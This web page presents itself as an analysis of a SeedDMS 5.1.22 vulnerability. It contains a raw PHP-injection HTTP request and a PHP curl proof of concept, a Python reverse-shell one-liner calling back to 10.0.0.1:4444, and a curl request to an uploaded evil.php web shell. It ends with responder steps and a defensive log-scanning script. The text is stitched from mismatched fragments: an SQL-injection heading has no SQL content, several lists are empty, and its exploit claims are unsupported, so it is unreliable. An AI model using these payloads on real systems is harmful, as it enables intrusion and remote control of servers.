SeedDMS 5.1.22 Exploit Verified May 2026

SeedDMS 5.1.22 Vulnerability Analysis and Exploit

Introduction

SeedDMS is a popular open-source document management system used by organizations to manage and store documents. Version 5.1.22 of SeedDMS was found to have several vulnerabilities, including a critical exploit that allows an attacker to compromise the system. This paper aims to provide an analysis of the vulnerability and a detailed explanation of the exploit.

Vulnerability Analysis

The vulnerability in SeedDMS 5.1.22 is due to a lack of proper input validation and sanitization in the out.php file. Specifically, the $folder parameter is not validated, allowing an attacker to inject malicious input.

Exploit Details

The flaw is a PHP code injection vulnerability that allows an attacker to execute arbitrary PHP code on the server. It can be triggered by sending a malicious request to the out.php file with the following parameters:

Exploit Code

The following is an example of the exploit code:

POST /seeddms/out.php HTTP/1.1
Host: <target_host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.3
folder=system('id');
id=1

Exploitation Steps

  1. The attacker sends the malicious request to the out.php file with the exploit code.
  2. The server executes the malicious PHP code, which returns the output of the id command.
  3. The attacker can then use the output to gain further information about the system and potentially escalate privileges.

Proof of Concept

The following proof-of-concept code demonstrates the exploit:

<?php
$url = 'http://<target_host>/seeddms/out.php';
$data = array(
    'folder' => 'system(\'id\')',
    'id' => '1'
);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
echo $response;

Mitigation and Recommendations

To mitigate this vulnerability, it is recommended to:

  1. Upgrade to SeedDMS version 5.1.23 or later, which fixes the vulnerability.
  2. Implement proper input validation and sanitization for all user-input parameters.
  3. Use a web application firewall (WAF) to detect and block suspicious traffic.

Conclusion

The SeedDMS 5.1.22 exploit is a critical vulnerability that allows an attacker to compromise the system. This paper provides a detailed analysis of the vulnerability and the exploit, as well as recommendations for mitigation and prevention. It is essential for organizations using SeedDMS to take immediate action to protect their systems from potential attacks.

Part 5: Detection – How to Know If You've Been Hacked

Vulnerability 1: Pre-Authentication SQL Injection (CVE-2021-3397)

Weaponization

Attackers can then:

Example reverse shell (URL encoded):

/seeddms51/conf/settings.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"]);'

The Flaw

SeedDMS 5.1.22 allows an authenticated user with "Manage Tools" permission to modify the settings.php file content via the "Custom Setup" interface (out/out.BackupTools.php). The parameter $settings is written to conf/settings.php without adequate filtering of PHP code.

Step 5: Gaining Code Execution

Once the shell's URL is confirmed:

curl "http://192.168.1.100/seeddms51/data/1000/1/1/evil.php?cmd=id"

Output: uid=33(www-data) gid=33(www-data) ... SeedDMS 5

From here, the attacker can:


Exploitability & risk

Suggested timeline for responders

  1. Immediately block public access to upload functionality if feasible.
  2. Check for and remove suspicious files; preserve copies for forensics.
  3. Rotate credentials and secrets that may have been exposed.
  4. Apply vendor patch or upgrade.
  5. Review logs and assess scope of compromise.
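
To support steps 2 and 5, the following added example (not part of the original write-up or of SeedDMS) scans web-server access logs for the request shapes shown on this page: a script requested from the data directory, a direct request to conf/settings.php, and a cmd query parameter. It assumes Apache combined log format; the log lines are constructed samples and the function names are illustrative.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [02/May/2026:10:01:11 +0000] "GET /seeddms51/out/out.ViewFolder.php?folderid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [02/May/2026:10:04:37 +0000] "GET /seeddms51/data/1000/1/1/evil.php?cmd=id HTTP/1.1" 200 54 "-" "curl/8.5.0"
203.0.113.9 - - [02/May/2026:10:05:02 +0000] "GET /seeddms51/conf/settings.php?cmd=whoami HTTP/1.1" 200 31 "-" "curl/8.5.0"
198.51.100.4 - - [02/May/2026:10:06:40 +0000] "GET /seeddms51/data/1000/2/1.pdf HTTP/1.1" 403 199 "-" "Mozilla/5.0"
"""

# client, timestamp, method, request target, status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def classify(target):
    """Return the reasons a request target is suspicious (empty list if none)."""
    parts = urlsplit(target)
    path = parts.path.lower()
    reasons = []
    # Assumption: the data directory holds uploaded documents, so nothing
    # under it should ever be requested as a PHP-family script.
    if re.search(r'/data/.*\.ph(p\d?|tml|ar)$', path):
        reasons.append("script requested from data directory")
    # settings.php is a configuration file; browsers have no reason to fetch it.
    if path.endswith('/conf/settings.php'):
        reasons.append("direct request to conf/settings.php")
    # The command parameter name used in the requests shown on this page.
    if 'cmd' in parse_qs(parts.query, keep_blank_values=True):
        reasons.append("cmd query parameter")
    return reasons

def scan(log_text):
    """Yield (client, timestamp, status, target, reasons) for suspicious lines."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, ts, _method, target, status = m.groups()
        reasons = classify(target)
        if reasons:
            yield client, ts, int(status), target, reasons

if __name__ == "__main__":
    for client, ts, status, target, reasons in scan(SAMPLE_LOG):
        print(f"{ts} {client} {status} {target} -> {', '.join(reasons)}")
```

A hit with status 200 deserves priority, since it means the server answered the request rather than rejecting it; the client addresses and timestamps of hits give a starting point for scoping the rest of the log review.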